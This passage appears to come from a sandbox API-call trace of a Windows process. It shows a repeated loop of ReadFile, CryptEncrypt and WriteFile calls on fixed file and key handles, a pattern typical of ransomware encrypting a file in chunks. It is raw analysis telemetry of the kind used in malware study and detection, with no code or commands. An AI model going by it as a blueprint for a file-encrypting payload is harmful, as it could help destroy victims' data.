lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.971] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.971] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.972] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.972] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.972] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.972] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.972] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.973] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.973] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.973] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.973] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.973] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.973] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.974] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.975] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.975] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.975] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.975] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.975] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.975] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.976] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.976] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.976] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.976] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.976] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.977] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.977] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.977] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.977] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.977] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.978] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.978] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.978] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.978] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.978] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.979] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.979] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 